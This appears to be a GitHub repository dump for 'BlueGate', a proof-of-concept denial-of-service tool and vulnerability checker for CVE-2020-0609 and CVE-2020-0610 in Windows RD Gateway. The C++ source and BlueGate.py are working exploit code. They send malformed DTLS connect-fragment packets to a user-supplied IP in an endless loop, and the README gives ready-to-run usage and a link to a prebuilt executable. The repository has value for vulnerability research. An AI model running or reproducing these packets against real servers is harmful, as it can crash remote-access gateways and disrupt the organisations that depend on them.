├── old
    ├── Release
    │   └── BlueGate.exe
    ├── BlueGate
    │   ├── BlueGate.vcxproj.user
    │   ├── BlueGate.vcxproj.filters
    │   ├── BlueGate.h
    │   ├── BlueGate.cpp
    │   └── BlueGate.vcxproj
    ├── BlueGate.sln
    └── README.md
├── README.md
└── BlueGate.py


/old/Release/BlueGate.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ly4k/BlueGate/HEAD/old/Release/BlueGate.exe


--------------------------------------------------------------------------------
/old/BlueGate/BlueGate.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/old/BlueGate/BlueGate.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="BlueGate.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="BlueGate.h">
24 |       <Filter>Header Files</Filter>
25 |     </ClInclude>
26 |   </ItemGroup>
27 | </Project>


--------------------------------------------------------------------------------
/old/BlueGate/BlueGate.h:
--------------------------------------------------------------------------------
 1 | #include <iostream>
 2 | #include <WS2tcpip.h>
 3 | 
 4 | #include <openssl/ssl.h>
 5 | 
 6 | #define PKT_TYPE_CONNECT_REQ 1
 7 | #define PKT_TYPE_CONNECT_RESP 2
 8 | #define PKT_TYPE_PAYLOAD 3
 9 | #define PKT_TYPE_DISCONNECT 4
10 | #define PKT_TYPE_CONNECT_REQ_FRAGMENT 5
11 | 
12 | struct DTLSParams {
13 | 	SSL_CTX* ctx;
14 | 	SSL* ssl;
15 | 	BIO* bio;
16 | };
17 | 
18 | struct UDP_PACKET_HEADER {
19 | 	USHORT pktID;
20 | 	USHORT pktLen;
21 | };
22 | 
23 | struct AASYNDATA {
24 | 	USHORT uUpStreamMtu;
25 | 	USHORT uDownStreamMtu;
26 | 	DWORD fLossy;
27 | 	DWORD snSendISN;
28 | };
29 | 
30 | struct AASYNDATARESP {
31 | 	USHORT uUpStreamMtu;
32 | 	USHORT uDownStreamMtu;
33 | 	DWORD snRecvISN;
34 | };
35 | 
36 | struct CONNECT_PKT {
37 | 	UDP_PACKET_HEADER hdr;
38 | 	USHORT usPortNumber;
39 | 	USHORT cbAuthnCookieLen;
40 | 	AASYNDATA SynData;
41 | };
42 | 
43 | struct CONNECT_PKT_RESP {
44 | 	UDP_PACKET_HEADER hdr;
45 | 	AASYNDATARESP SynResponse;
46 | 	DWORD64 result;
47 | };
48 | 
49 | struct CONNECT_PKT_FRAGMENT {
50 | 	UDP_PACKET_HEADER hdr; // 4 bytes
51 | 	USHORT usFragmentID; // 2 bytes
52 | 	USHORT usNoOfFragments; // 2 bytes
53 | 	USHORT cbFragmentLength; // 2 bytes
54 | 	BYTE fragment[1000];  // 250 bytes
55 | };


--------------------------------------------------------------------------------
/old/BlueGate.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 16
 4 | VisualStudioVersion = 16.0.29201.188
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "BlueGate", "BlueGate\BlueGate.vcxproj", "{9178613D-52C7-4876-BBAD-F93C3784D79C}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Debug|x64.Build.0 = Debug|x64
18 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Debug|x86.Build.0 = Debug|Win32
20 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Release|x64.ActiveCfg = Release|x64
21 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Release|x64.Build.0 = Release|x64
22 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Release|x86.ActiveCfg = Release|Win32
23 | 		{9178613D-52C7-4876-BBAD-F93C3784D79C}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {D97BA022-3382-44A0-BD63-569535F8193A}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/old/README.md:
--------------------------------------------------------------------------------
 1 | # BlueGate
 2 | Proof of Concept (Denial of Service) for CVE-2020-0609 and CVE-2020-0610. 
 3 | 
 4 | These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP.
 5 | 
 6 | Please use for research and educational purpose only.
 7 | 
 8 | ## Usage
 9 | You must have the OpenSSL libraries and headers installed. The default location in the project settings is `C:\Program Files\OpenSSL-Win64`. If you don't have Visual Studio, you should make some minor changes in datatypes and socket initialization. 
10 | 
11 | ## Vulnerability
12 | The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`.  The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session.
13 | 
14 | If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well.
15 | 
16 | ## What is RD Gateway?
17 | RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet. Inside `Release` you will find an already compiled executable. Note that as soon as the executable is running, it will connect to the server and start sending malicious packets, **so be careful**.
18 | 
19 |     .\BlueGate.exe <IP address>
20 | 
21 | ## Why BlueGate?
22 | 
23 | That was just the working title, and I couldn't come up with a better one at this stage.
24 | 
25 | ## Todo:
26 | - Vulnerability scanner/checker
27 | - Python implementation


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | #  BlueGate
 3 | 
 4 | Proof of Concept (Denial of Service + scanner) for CVE-2020-0609 and CVE-2020-0610.
 5 | 
 6 |   
 7 | 
 8 | These vulnerabilities allows an unauthenticated attacker to gain remote code execution with highest privileges via RD Gateway for RDP.
 9 | 
10 |   
11 | 
12 | Please use for research and educational purpose only.
13 | 
14 |   
15 | 
16 | ##  Usage
17 | Make sure you have [pyOpenSSL](https://www.pyopenssl.org/en/stable/) installed for python3. 
18 | 
19 |     usage: BlueGate.py [-h] -M {check,dos} [-P PORT] host
20 |     
21 |     positional arguments:
22 |       host                  IP address of host
23 |     
24 |     optional arguments:
25 |       -h, --help            show this help message and exit
26 |       -M {check,dos}, --mode {check,dos}
27 |                             Mode
28 |       -P PORT, --port PORT  UDP port of RDG, default: 3391
29 | 
30 |   
31 | 
32 | ##  Vulnerability
33 | 
34 | The vulnerabilities allows an unauthenticated attacker to write forward out-of-bound in the heap, by specifying an unchecked and arbitrary index parameter `(0x00 - 0xFFFF)`. The data to write is also arbitrary with a length up to 1000 bytes at a time and a maximum of 4096 during one session.
35 | 
36 |   
37 | 
38 | If you would like to read more about the vulnerabilities, check [this](https://www.kryptoslogic.com/blog/2020/01/rdp-to-rce-when-fragmentation-goes-wrong/) or read my latest tweets on [Twitter](https://twitter.com/ollypwn) with a PoC video as well.
39 | 
40 |   
41 | 
42 | ##  What is RD Gateway?
43 | 
44 | RD Gateway acts as a proxy for RDP; i.e. between some internal servers and the internet, so you don't have to expose RDP directly to the internet.
45 | 
46 | ##  Why BlueGate?
47 | 
48 |   
49 | 
50 | That was just the working title, and I couldn't come up with a better one at this stage.
51 | 
52 |   
53 | 
54 | ##  Todo:
55 | 
56 | - ~~Vulnerability scanner/checker~~ **DONE**
57 | 
58 | - ~~Python implementation~~ **DONE**
59 | 
60 | 


--------------------------------------------------------------------------------
/old/BlueGate/BlueGate.cpp:
--------------------------------------------------------------------------------
  1 | #include "BlueGate.h"
  2 | 
  3 | void error(const char* msg)
  4 | {
  5 | 	printf("ERROR: %s\n", msg);
  6 | 	exit(EXIT_FAILURE);
  7 | }
  8 | 
  9 | void SOCKInit()
 10 | {
 11 | 	WSADATA wsaData;
 12 | 	int res;
 13 | 
 14 | 	res = WSAStartup(MAKEWORD(2, 2), &wsaData);
 15 | 
 16 | 	if (res != 0)
 17 | 		error("WSAStartup failed");
 18 | }
 19 | 
 20 | void DTLSInit()
 21 | {
 22 | 	SSL_library_init();
 23 | 	SSL_load_error_strings();
 24 | 	ERR_load_BIO_strings();
 25 | 	OpenSSL_add_all_algorithms();
 26 | }
 27 | 
 28 | int OpenUDPConnection(const char* hostname, int port)
 29 | {
 30 | 	int sockfd;
 31 | 	sockaddr_in addr;
 32 | 
 33 | 	sockfd = socket(AF_INET, SOCK_DGRAM, 0);
 34 | 
 35 | 	if (sockfd < 0)
 36 | 		error("Failed to open socket");
 37 | 
 38 | 	addr.sin_family = AF_INET;
 39 | 	addr.sin_port = htons(port);
 40 | 	
 41 | 	inet_pton(AF_INET, hostname, &(addr.sin_addr));
 42 | 
 43 | 	if (connect(sockfd, (struct sockaddr*) & addr, sizeof(addr)) != 0)
 44 | 	{
 45 | 		closesocket(sockfd);
 46 | 		error("Failed to connect socket");
 47 | 	}
 48 | 
 49 | 	return sockfd;
 50 | }
 51 | 
 52 | SSL* DTLSConnection(const char* hostname)
 53 | {
 54 | 	int sockfd;
 55 | 	int result;
 56 | 	DTLSParams client;
 57 | 	
 58 | 	sockfd = OpenUDPConnection(hostname, 3391);
 59 | 
 60 | 	client.ctx = SSL_CTX_new(DTLS_client_method());
 61 | 	client.bio = BIO_new_ssl_connect(client.ctx);
 62 | 
 63 | 	BIO_set_conn_hostname(client.bio, hostname);
 64 | 	BIO_get_ssl(client.bio, &(client.ssl));
 65 | 
 66 | 	SSL_set_connect_state(client.ssl);
 67 | 	SSL_set_mode(client.ssl, SSL_MODE_AUTO_RETRY);
 68 | 
 69 | 	SSL_set_fd(client.ssl, sockfd);
 70 | 
 71 | 	if (SSL_connect(client.ssl) != 1) {
 72 | 		return NULL;
 73 | 	}
 74 | 	
 75 | 	return client.ssl;
 76 | }
 77 | 
 78 | int send_dos_packet(SSL* ssl, int id) {
 79 | 	CONNECT_PKT_FRAGMENT packet;
 80 | 
 81 | 	packet.hdr.pktID = PKT_TYPE_CONNECT_REQ_FRAGMENT;
 82 | 	packet.hdr.pktLen = sizeof(CONNECT_PKT_FRAGMENT) - sizeof(UDP_PACKET_HEADER);
 83 | 	packet.usFragmentID = id;
 84 | 	packet.usNoOfFragments = id;
 85 | 	packet.cbFragmentLength = 1000;
 86 | 	memset(packet.fragment, 0x41, 1000);
 87 | 
 88 | 	char pkt[sizeof(packet)];
 89 | 	memcpy(&pkt, &packet, sizeof(packet));
 90 | 
 91 | 	return SSL_write(ssl, pkt, sizeof(pkt));
 92 | }
 93 | 
 94 | int main(int argc, char* argv[])
 95 | {
 96 | 	
 97 | 	SSL* ssl;
 98 | 	int i = 0;
 99 | 	char* hostname;
100 | 
101 | 	if (argc != 2) {
102 | 		printf("Usage: %s <IP address>\n", argv[0]);
103 | 		return 0;
104 | 	}
105 | 
106 | 	hostname = argv[1];
107 | 
108 | 	SOCKInit();
109 | 	DTLSInit();
110 | 	
111 | 	while (i++ > -1) {
112 | 		ssl = DTLSConnection(hostname);
113 | 
114 | 		if (ssl == NULL) {
115 | 			break;
116 | 		}
117 | 		
118 | 		for (int n = 0; n < 4; n++) {
119 | 			send_dos_packet(ssl, i+n);
120 | 			printf("Sending packet [%u]\n", i + n);
121 | 		}
122 | 
123 | 		i++;
124 | 	}
125 | 
126 | 
127 | 	return 0;
128 | }


--------------------------------------------------------------------------------
/BlueGate.py:
--------------------------------------------------------------------------------
  1 | #!/bin/env python3
  2 | from cryptography.hazmat.bindings.openssl.binding import Binding
  3 | from OpenSSL import SSL
  4 | import argparse
  5 | import os
  6 | import select
  7 | import signal
  8 | import socket
  9 | import struct
 10 | import sys
 11 | 
 12 | TIMEOUT = 3
 13 | 
 14 | def init_dtls():
 15 |         binding = Binding()
 16 |         binding.init_static_locks()
 17 |         SSL.Context._methods[0]= getattr(binding.lib, "DTLSv1_client_method")
 18 | 
 19 | def log_info(s):
 20 |     print(f"\033[96m[*] {s}\033[0m")
 21 | 
 22 | def log_success(s):
 23 |     print(f"\033[92m[+] {s}\033[0m")
 24 | 
 25 | def log_error(s):
 26 |     print(f"\033[91m[-] {s}\033[0m")
 27 | 
 28 | class Packet:
 29 |     def __init__(self, fragment_id = 0, no_of_fragments = 1, fragment_length = 0, fragment = b""):
 30 |         self.fragment_id     = fragment_id
 31 |         self.no_of_fragments = no_of_fragments
 32 |         self.fragment_length = fragment_length
 33 |         self.fragment        = fragment
 34 |         self.pkt_ID          = 5
 35 |         self.pkt_Len         = 0
 36 | 
 37 |     def update_pkt_Len(self):
 38 |         self.pkt_Len = len(self.fragment) + 6
 39 | 
 40 |     def __bytes__(self):
 41 |         self.update_pkt_Len()
 42 | 
 43 |         buf  = b""
 44 |         buf += struct.pack("<HHHHH", 
 45 |                             self.pkt_ID,
 46 |                             self.pkt_Len,
 47 |                             self.fragment_id, 
 48 |                             self.no_of_fragments, 
 49 |                             self.fragment_length)
 50 |         buf += self.fragment
 51 | 
 52 |         return buf
 53 | 
 54 | class Connection:
 55 |     def __init__(self, host = None, port = None, shouldConnect = True):
 56 |         self.host          = host
 57 |         self.port          = port
 58 |         self.shouldConnect = shouldConnect
 59 | 
 60 |         init_dtls()
 61 | 
 62 |         signal.signal(signal.SIGALRM, self.broken_connection)
 63 | 
 64 |         self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
 65 |         self.connection = SSL.Connection(SSL.Context(0), self.socket)
 66 |         
 67 |         if shouldConnect:
 68 |             self.connect()
 69 | 
 70 |     def broken_connection(self, signum, frame):
 71 |         log_success("Connection not responding")
 72 | 
 73 |         try:
 74 |             self.close()
 75 |         except:
 76 |             pass
 77 | 
 78 |         sys.exit()
 79 | 
 80 |     def connect(self):
 81 |         signal.alarm(TIMEOUT)
 82 |         try:
 83 |             self.connection.connect((self.host, self.port))
 84 |             self.connection.do_handshake()
 85 |         except SSL.SysCallError:
 86 |             log_error("Could not connect to RD Gateway")
 87 |             sys.exit()
 88 |         signal.alarm(0)
 89 | 
 90 |     def send_dos_packet(self, id):
 91 |         packet = Packet(
 92 |             id, id, 1000, b"\x41"*1000
 93 |         )
 94 |         self.write(bytes(packet))
 95 | 
 96 |     def is_vulnerable(self):
 97 |         log_info(f"Checking if {self.host} is vulnerable...")
 98 |         
 99 |         packet = Packet(
100 |             0, 65, 1, b"\x00"
101 |         )
102 | 
103 |         self.write(bytes(packet))
104 |         
105 |         ready = select.select([self.socket], [], [], TIMEOUT)
106 |         if ready[0]:
107 |             buf = self.read(16)
108 |             return not (0x8000ffff == struct.unpack('<L', buf[-4:])[0])
109 |         
110 |         return True
111 | 
112 |     def close(self):
113 |         self.connection.shutdown()
114 | 
115 |     def write(self, buffer):
116 |         self.connection.send(buffer)
117 |         
118 |     def read(self, size):
119 |         return self.connection.recv(size)
120 | 
121 | if __name__ == "__main__":
122 |     parser = argparse.ArgumentParser()
123 |     parser.add_argument("-M", "--mode", choices=["check","dos"], required=True, type=str.lower, default=False, help="Mode")
124 |     parser.add_argument("-P","--port", default=3391, help="UDP port of RDG, default: 3391", required=False, type=int)
125 |     parser.add_argument("host", help="IP address of host")
126 |     
127 |     args = parser.parse_args()
128 | 
129 |     if args.mode == "check":
130 |         connection = Connection(args.host, args.port)
131 |         is_vulnerable = connection.is_vulnerable()
132 | 
133 |         if is_vulnerable:
134 |             log_success("Host is vulnerable")
135 |         else:
136 |             log_error("Host is not vulnerable")
137 |         
138 |     if args.mode == "dos":
139 |         log_info(f"Sending DoS packets to {args.host}...")
140 | 
141 |         i = 0
142 |         while i > -1:
143 |             connection = Connection(args.host, args.port)
144 |             for n in range(4):
145 |                 connection.send_dos_packet(i+n)
146 |             i += 1


--------------------------------------------------------------------------------
/old/BlueGate/BlueGate.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>16.0</VCProjectVersion>
 23 |     <ProjectGuid>{9178613D-52C7-4876-BBAD-F93C3784D79C}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>BlueGate</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v142</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v142</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v142</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v142</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>
 88 |       </PrecompiledHeader>
 89 |       <WarningLevel>Level3</WarningLevel>
 90 |       <Optimization>Disabled</Optimization>
 91 |       <SDLCheck>true</SDLCheck>
 92 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 93 |       <ConformanceMode>true</ConformanceMode>
 94 |     </ClCompile>
 95 |     <Link>
 96 |       <SubSystem>Console</SubSystem>
 97 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 98 |     </Link>
 99 |   </ItemDefinitionGroup>
100 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
101 |     <ClCompile>
102 |       <PrecompiledHeader>
103 |       </PrecompiledHeader>
104 |       <WarningLevel>Level3</WarningLevel>
105 |       <Optimization>Disabled</Optimization>
106 |       <SDLCheck>true</SDLCheck>
107 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
108 |       <ConformanceMode>true</ConformanceMode>
109 |       <AdditionalIncludeDirectories>C:\Program Files\OpenSSL-Win64\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
110 |     </ClCompile>
111 |     <Link>
112 |       <SubSystem>Console</SubSystem>
113 |       <GenerateDebugInformation>true</GenerateDebugInformation>
114 |       <AdditionalLibraryDirectories>C:\Program Files\OpenSSL-Win64\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
115 |       <AdditionalDependencies>kernel32.lib;ws2_32.lib;crypt32.lib;libcrypto.lib;libssl.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
116 |     </Link>
117 |   </ItemDefinitionGroup>
118 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
119 |     <ClCompile>
120 |       <PrecompiledHeader>
121 |       </PrecompiledHeader>
122 |       <WarningLevel>Level3</WarningLevel>
123 |       <Optimization>MaxSpeed</Optimization>
124 |       <FunctionLevelLinking>true</FunctionLevelLinking>
125 |       <IntrinsicFunctions>true</IntrinsicFunctions>
126 |       <SDLCheck>true</SDLCheck>
127 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
128 |       <ConformanceMode>true</ConformanceMode>
129 |     </ClCompile>
130 |     <Link>
131 |       <SubSystem>Console</SubSystem>
132 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
133 |       <OptimizeReferences>true</OptimizeReferences>
134 |       <GenerateDebugInformation>true</GenerateDebugInformation>
135 |     </Link>
136 |   </ItemDefinitionGroup>
137 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
138 |     <ClCompile>
139 |       <PrecompiledHeader>
140 |       </PrecompiledHeader>
141 |       <WarningLevel>Level3</WarningLevel>
142 |       <Optimization>MaxSpeed</Optimization>
143 |       <FunctionLevelLinking>true</FunctionLevelLinking>
144 |       <IntrinsicFunctions>true</IntrinsicFunctions>
145 |       <SDLCheck>true</SDLCheck>
146 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
147 |       <ConformanceMode>true</ConformanceMode>
148 |       <AdditionalIncludeDirectories>C:\Program Files\OpenSSL-Win64\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
149 |     </ClCompile>
150 |     <Link>
151 |       <SubSystem>Console</SubSystem>
152 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
153 |       <OptimizeReferences>true</OptimizeReferences>
154 |       <GenerateDebugInformation>true</GenerateDebugInformation>
155 |       <AdditionalLibraryDirectories>C:\Program Files\OpenSSL-Win64\lib;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
156 |       <AdditionalDependencies>kernel32.lib;ws2_32.lib;crypt32.lib;libcrypto.lib;libssl.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)</AdditionalDependencies>
157 |     </Link>
158 |   </ItemDefinitionGroup>
159 |   <ItemGroup>
160 |     <ClCompile Include="BlueGate.cpp" />
161 |   </ItemGroup>
162 |   <ItemGroup>
163 |     <ClInclude Include="BlueGate.h" />
164 |   </ItemGroup>
165 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
166 |   <ImportGroup Label="ExtensionTargets">
167 |   </ImportGroup>
168 | </Project>


--------------------------------------------------------------------------------